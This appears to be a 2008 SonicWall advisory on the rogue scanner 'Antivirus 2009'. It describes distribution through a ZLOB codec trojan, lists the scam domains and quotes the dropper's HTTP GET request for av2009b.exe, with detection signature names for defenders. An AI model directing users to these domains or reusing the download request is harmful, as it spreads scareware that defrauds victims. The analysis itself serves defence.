Fake anti-spyware Antivirus 2009 (July 18, 2008)


July 18, 2008

A public beta of Norton Antivirus 2009 opened this week and the scammers didn’t wait long to follow suit with a new bogus scanner: Antivirus 2009.

Antivirus 2009, also known as Antivirus2009, is a rogue anti-spyware program that uses false spyware results to lure you to purchase its full version. Antivirus2009 is an updated version of Antivirus 2008.

Antivirus 2009 is usually promoted via a ZLOB/MediaAccess Codec installer found on adult websites. Zlob has been the trojan of choice to infect users with pop ups disguised as system notifications that lead to websites with rogue anti-spyware programs. You can also install Antivirus 2009 manually on the rogue websites:

More related URLs:

  • Antivirus-2009.com
  • antivirus-scanner.com
  • antivirus2009professional.com
  • antispyware2008purchase.com
  • virusremover2008.com
  • antivirus2009-freescan.com
  • antivirus2009-scanner.com
  • totalantivirusonline.com
  • virus9-webscanner.com
  • windows-scanner.com
  • virus9-webscanner.com
  • xponlinescanner9.com
  • freewebscanner.com


We recomend blocking the above domains by editing your local hosts file to redirect them to

When clicking on SCAN or CHECK YOUR PC, a “AV2009Install_0011.exe” file is pushed on to your system. It’s usually run-time compressed with UPX or PolyCrypt packer. We have received at least 140 different variants of this threat.

When run it issues a GET HTTP request as follows:

 GET /download/av2009b.exe HTTP/1.1              Host: antivirus-2009.com           


Then the fake antimalware product is installed and starts giving fake results and making the system unusable until a full version is purchased.




SonicWALL is blocking this threat with GAV: XPAntivirus_12 (Adware) and GAV: Fakealert.TY (Trojan) signatures.

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.